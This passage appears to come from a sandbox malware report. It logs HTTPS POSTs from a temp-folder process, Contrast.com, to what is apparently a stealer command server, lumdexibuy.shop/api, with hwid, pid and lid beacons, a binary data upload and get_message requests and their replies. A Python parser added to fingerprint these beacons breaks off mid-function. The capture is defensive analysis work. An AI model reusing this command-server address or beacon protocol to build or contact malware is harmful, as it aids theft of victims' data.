                                                                                                                                      2024-11-29 14:12:49 UTC15041OUTData Raw: 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 34 53 57 43 37 52 32 55 30 4c 53 32 0d 0a
                                                                                                                                      Data Ascii: --4SWC7R2U0LS2Content-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--4SWC7R2U0LS2Content-Disposition: form-data; name="pid"2--4SWC7R2U0LS2Content-Disposition: form-data; name="lid"hRjzG3--KASTA--4SWC7R2U0LS2
2024-11-29 14:12:52 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:52 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=8afp70087ns2r0h0q0fs95vkc4; expires=Tue, 25-Mar-2025 07:59:29 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P28fq9eMmo2cR02uYtQHnVrJzyNxPomULUrgzxWh4nsoStN0zduVqqL%2FXUjXXNKy9dsRYibvIukKKMgTyszpYFiWtg%2BN%2Bvuq6%2B6Zv1xRU2xVAcFSOplxCpmxJs%2FXhvYFQPU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea331e46ee943e2-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1595&rtt_var=611&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15974&delivery_rate=1770770&cwnd=212&unsent_bytes=0&cid=d30e1f2e31928db6&ts=2900&x=0"
2024-11-29 14:12:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
2024-11-29 14:12:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49797 | 104.21.63.229 | 443 | 6180 | C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:12:54 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=082MXLHK4KN3N
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20537
                                                                                                                                      Host: lumdexibuy.shop
                                                                                                                                      2024-11-29 14:12:54 UTC15331OUTData Raw: 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e 33 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e 33 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e 33 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 30 38 32 4d 58 4c 48 4b 34 4b 4e
                                                                                                                                      Data Ascii: --082MXLHK4KN3NContent-Disposition: form-data; name="hwid"B039C24FE88F1CD2D649654BC398E23D--082MXLHK4KN3NContent-Disposition: form-data; name="pid"3--082MXLHK4KN3NContent-Disposition: form-data; name="lid"hRjzG3--KASTA--082MXLHK4KN
                                                                                                                                      2024-11-29 14:12:54 UTC5206OUTData Raw: 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: Wun 4F([:7s~X`nO`i
2024-11-29 14:12:57 UTC | 1011 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 14:12:57 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=577eddagcinbel574463pkcr3i; expires=Tue, 25-Mar-2025 07:59:33 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w54pLtVgViWqB%2FsywSpRyuyB82t5kDy9SKXGnnqQJNO9SqioOkka156uzWKucAVA0aGXwVxMCOH2q352o233TtYGB2KhKwezQTAZ9C6f06hTVPvqliuaocu0EKI91r9ucOM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea332000efdf799-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1477&rtt_var=572&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21493&delivery_rate=1882656&cwnd=59&unsent_bytes=0&cid=2b1949cacf6ba940&ts=3092&x=0"
2024-11-29 14:12:57 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii (CRLF shown as \r\n; chunk size 0xf = 15 bytes): f\r\nok 8.46.123.228\r\n
2024-11-29 14:12:57 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (CRLF shown as \r\n): 0\r\n\r\n (terminating zero-length chunk)


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49809 | Destination IP: 104.21.63.229 | Destination Port: 443 | PID: 6180 | Process: C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:12:58 UTC | 276 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=YQUFHPP0DGAK0A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 7064
Host: lumdexibuy.shop
2024-11-29 14:12:58 UTC | 7064 bytes | OUT | Data Raw: 2d 2d 59 51 55 46 48 50 50 30 44 47 41 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 59 51 55 46 48 50 50 30 44 47 41 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 51 55 46 48 50 50 30 44 47 41 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 59 51 55 46 48 50 50 30
Data Ascii (CRLF shown as \r\n; the report shows only the start of the 7064-byte body): --YQUFHPP0DGAK0A\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nB039C24FE88F1CD2D649654BC398E23D\r\n--YQUFHPP0DGAK0A\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n--YQUFHPP0DGAK0A\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--KASTA\r\n--YQUFHPP0 [truncated in the report]
2024-11-29 14:13:01 UTC | 1010 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:13:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vohp3ejnnhtqvbqi2c6gnbisdk; expires=Tue, 25-Mar-2025 07:59:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5HfWptYP4HdsnxEk34VwDb2Z36bC19Bw3oLx9CU4ic3vLC9elXI6Srrecr0WsMRBOlLfqMYqJ8kpLL1zkgVELsLafVcaLz2BGZRO3cHXBZDe8AjTe%2FrdJP2fvlCE51IafZk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea3321c09b143b0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1579&rtt_var=613&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2835&recv_bytes=7976&delivery_rate=1755862&cwnd=215&unsent_bytes=0&cid=a6457cc786f9c8bf&ts=2870&x=0"
2024-11-29 14:13:01 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii (CRLF shown as \r\n; chunk size 0xf = 15 bytes): f\r\nok 8.46.123.228\r\n
2024-11-29 14:13:01 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (CRLF shown as \r\n): 0\r\n\r\n (terminating zero-length chunk)


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49819 | Destination IP: 104.21.63.229 | Destination Port: 443 | PID: 6180 | Process: C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:13:02 UTC | 278 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=HX3TOI8KOQNOLIDM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1214
Host: lumdexibuy.shop
2024-11-29 14:13:02 UTC | 1214 bytes | OUT | Data Raw: 2d 2d 48 58 33 54 4f 49 38 4b 4f 51 4e 4f 4c 49 44 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 48 58 33 54 4f 49 38 4b 4f 51 4e 4f 4c 49 44 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 58 33 54 4f 49 38 4b 4f 51 4e 4f 4c 49 44 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 48 58
Data Ascii (CRLF shown as \r\n; the report shows only the start of the 1214-byte body): --HX3TOI8KOQNOLIDM\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nB039C24FE88F1CD2D649654BC398E23D\r\n--HX3TOI8KOQNOLIDM\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n--HX3TOI8KOQNOLIDM\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--KASTA\r\n--HX [truncated in the report]
2024-11-29 14:13:05 UTC | 1007 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:13:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2d2u8vsr0k9djb322v1d7kfjle; expires=Tue, 25-Mar-2025 07:59:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GN5r7T2o9cAyeN1A9Pmuyh3NQXRZqZ2soMe9BI2KuhN9z37gtcP74UQ4gW2FkKwH1ewYVL7YAbwW2rXQr2duxxtwN5z6gzPTP0uHP1DbQ7G8DhOOp9nib2JoFHs3o4RnnQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea332369c0d1795-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1490&rtt_var=571&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2128&delivery_rate=1897335&cwnd=172&unsent_bytes=0&cid=e57b3345a4259166&ts=2512&x=0"
2024-11-29 14:13:05 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii (CRLF shown as \r\n; chunk size 0xf = 15 bytes): f\r\nok 8.46.123.228\r\n
2024-11-29 14:13:05 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (CRLF shown as \r\n): 0\r\n\r\n (terminating zero-length chunk)


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49826 | Destination IP: 104.21.63.229 | Destination Port: 443 | PID: 6180 | Process: C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:13:06 UTC | 275 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=PTOPGS84MNK72
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1105
Host: lumdexibuy.shop
2024-11-29 14:13:06 UTC | 1105 bytes | OUT | Data Raw: 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44 0d 0a 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 0d 0a 2d 2d 50 54 4f 50 47 53 38 34 4d 4e 4b
Data Ascii (CRLF shown as \r\n; the report shows only the start of the 1105-byte body): --PTOPGS84MNK72\r\nContent-Disposition: form-data; name="hwid"\r\n\r\nB039C24FE88F1CD2D649654BC398E23D\r\n--PTOPGS84MNK72\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n--PTOPGS84MNK72\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--KASTA\r\n--PTOPGS84MNK [truncated in the report]
2024-11-29 14:13:09 UTC | 1009 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:13:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=unnmekofebtaa4fa3mh6pn66rg; expires=Tue, 25-Mar-2025 07:59:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCeRpmruadhyyuMR5AMbz9RN4LJRjMzWG80eqTF%2FZG78Ppf98gCVEoreBTwk9GLsYehNBfQc60cnWX56Ckxx7GMk7ixrgIjOMCaZPrrTPsSj02YSAifOybcHzSWGuUq9LTQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea3324ebbaf7c7c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1805&rtt_var=690&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2016&delivery_rate=1572428&cwnd=252&unsent_bytes=0&cid=7e76dcf853d22780&ts=2988&x=0"
2024-11-29 14:13:09 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii (CRLF shown as \r\n; chunk size 0xf = 15 bytes): f\r\nok 8.46.123.228\r\n
2024-11-29 14:13:09 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (CRLF shown as \r\n): 0\r\n\r\n (terminating zero-length chunk)


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49837 | Destination IP: 104.21.63.229 | Destination Port: 443 | PID: 6180 | Process: C:\Users\user\AppData\Local\Temp\108941\Contrast.com
Timestamp | Bytes transferred | Direction | Data
2024-11-29 14:13:11 UTC | 264 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 114
Host: lumdexibuy.shop
2024-11-29 14:13:11 UTC | 114 bytes | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36 26 68 77 69 64 3d 42 30 33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--KASTA&j=7567fff5468f5b682780aea4c2eb6266&hwid=B039C24FE88F1CD2D649654BC398E23D
2024-11-29 14:13:14 UTC | 1017 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 14:13:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c9be3r1mq9lig9ktj5aq8ofhg7; expires=Tue, 25-Mar-2025 07:59:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YloFk02N%2BkEppC9yDBIrpE%2BteHh%2FojyCoLFWUKswo%2B0LAOx1PuRcHxu7EYCzliJKJFyRuFa0Whmvw93vMt5JIoKo%2F8p7FpPcE3dxsQbIlXjiRFDvd1sjYDKiPNGjcmalPW4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ea3326a4a8a42b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1583&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1014&delivery_rate=1802469&cwnd=236&unsent_bytes=0&cid=af45dd751f7d6cbb&ts=2950&x=0"
2024-11-29 14:13:14 UTC | 352 bytes | IN | Data Raw: 31 61 30 0d 0a 59 43 6b 6e 65 62 37 73 56 39 50 52 36 49 70 73 52 61 6c 30 46 31 30 77 49 45 63 4f 6c 72 41 37 6a 70 6a 69 45 50 34 79 76 4f 59 37 55 67 55 4d 6e 4e 5a 31 75 36 57 63 2b 68 39 2f 39 56 74 4c 63 6b 42 42 4e 48 72 7a 30 6c 4c 67 74 6f 46 2f 6b 32 36 54 6c 41 46 65 65 31 62 62 6e 68 75 4c 35 72 33 35 4f 47 65 46 56 6e 45 70 45 68 70 31 49 72 54 56 47 62 53 6f 6e 7a 79 46 45 4d 6e 45 57 67 74 50 44 63 71 63 4a 4f 6d 4e 78 39 5a 44 4a 73 30 61 4a 6e 4e 41 53 54 39 72 2b 70 31 49 2b 76 65 51 61 64 42 42 31 49 6b 51 64 51 67 34 2f 39 73 44 68 5a 33 64 73 6a 78 38 6e 7a 70 66 44 58 74 31 44 7a 32 68 39 68 58 73 38 59 77 79 30 68 44 61 6b 6b 49 54 46 31 57 63 69 58 58 70 34 5a 57 6d 46 32 66 63 56 69 31 2f 57 46 51 7a 66 75 57 4b 5a 36 48 45 7a 57
Data Ascii (CRLF shown as \r\n; chunk size 0x1a0 = 416 bytes of base64-alphabet text, of which the report shows only the start of this 352-byte row): 1a0\r\nYCkneb7sV9PR6IpsRal0F10wIEcOlrA7jpjiEP4yvOY7UgUMnNZ1u6Wc+h9/9VtLckBBNHrz0lLgtoF/k26TlAFee1bbnhuL5r35OGeFVnEpEhp1IrTVGbSonzyFEMnEWgtPDcqcJOmNx9ZDJs0aJnNAST9r+p1I+veQadBB1IkQdQg4/9sDhZ3dsjx8nzpfDXt1Dz2h9hXs8Ywy0hDakkITF1WciXXp4ZWmF2fcVi1/WFQzfuWKZ6HEzW [truncated in the report]
2024-11-29 14:13:14 UTC | 71 bytes | IN | Data Raw: 4c 69 43 32 6d 74 70 48 6f 46 53 79 52 57 6d 51 31 58 31 41 62 49 66 2f 65 54 39 48 37 6a 6d 43 68 58 74 69 55 50 31 70 50 47 4a 43 59 4c 36 66 7a 78 4b 67 4b 4d 59 74 4f 4a 58 45 53 52 57 55 30 70 38 31 6d 0d 0a
Data Ascii (CRLF shown as \r\n; tail of the same 416-byte chunk): LiC2mtpHoFSyRWmQ1X1AbIf/eT9H7jmChXtiUP1pPGJCYL6fzxKgKMYtOJXESRWU0p81m\r\n
2024-11-29 14:13:14 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (CRLF shown as \r\n): 0\r\n\r\n (terminating zero-length chunk)

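Sessions 5 to 8 are the same beacon repeated: three multipart POSTs to /api carrying hwid, pid and lid, then one urlencoded act=get_message POST that repeats lid and hwid and adds j and ver=4.0; hwid and lid are identical in every request. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses both body formats straight from the bytes shown above (the session 5 body is reconstructed from its Data Raw dump with CRLFs restored and is truncated exactly where the report truncates it; the session 8 body is the complete 114-byte dump) and fingerprints each request. The field semantics are taken from the capture as-is; the match descriptions are my own wording.

```python
"""Parse and fingerprint the /api beacons captured in sessions 5 to 8 (added example)."""
import re
from urllib.parse import parse_qs

# Session 5 request body as shown in the report, CRLFs restored. The report cuts the
# 7064-byte body after the "lid" part, so the last boundary is truncated ("--YQUFHPP0").
BOUNDARY = "YQUFHPP0DGAK0A"
MULTIPART_BODY = (
    "--YQUFHPP0DGAK0A\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "B039C24FE88F1CD2D649654BC398E23D\r\n"
    "--YQUFHPP0DGAK0A\r\n"
    'Content-Disposition: form-data; name="pid"\r\n\r\n'
    "1\r\n"
    "--YQUFHPP0DGAK0A\r\n"
    'Content-Disposition: form-data; name="lid"\r\n\r\n'
    "hRjzG3--KASTA\r\n"
    "--YQUFHPP0"
)

# Session 8 request body: all 114 bytes of its Data Raw row.
GET_MESSAGE_HEX = (
    "61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d "
    "68 52 6a 7a 47 33 2d 2d 4b 41 53 54 41 26 6a 3d 37 35 36 37 66 66 66 35 34 36 38 66 "
    "35 62 36 38 32 37 38 30 61 65 61 34 63 32 65 62 36 32 36 36 26 68 77 69 64 3d 42 30 "
    "33 39 43 32 34 46 45 38 38 46 31 43 44 32 44 36 34 39 36 35 34 42 43 33 39 38 45 32 33 44"
)

_NAME_RE = re.compile(r'name="([^"]*)"')


def parse_multipart(body, boundary):
    """Return {field: value} for a multipart/form-data body, tolerating a truncated capture."""
    delim = "--" + boundary
    fields = {}
    for part in body.split(delim)[1:]:          # [0] is the preamble before the first boundary
        if part.startswith("--"):               # "--" right after the delimiter closes the body
            break
        if "\r\n\r\n" not in part:              # headers cut off before the blank line: unusable
            continue
        headers, value = part.split("\r\n\r\n", 1)
        name = _NAME_RE.search(headers)
        if not name:
            continue
        # A truncated dump can end in the middle of the next boundary line; drop that tail.
        tail_at = value.rfind("\r\n")
        if tail_at != -1 and value[tail_at + 2:] and delim.startswith(value[tail_at + 2:]):
            value = value[:tail_at]
        fields[name.group(1)] = value.rstrip("\r\n")
    return fields


def parse_get_message(raw_hex):
    """Decode an application/x-www-form-urlencoded body from its Data Raw hex dump."""
    body = bytes.fromhex(raw_hex).decode("ascii")
    return {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}


def fingerprint(path, content_type, fields):
    """Reasons a request matches the beacon shapes seen in this capture; [] means none."""
    reasons = []
    names = set(fields)
    if path == "/api" and content_type.startswith("multipart/form-data") \
            and {"hwid", "pid", "lid"} <= names:
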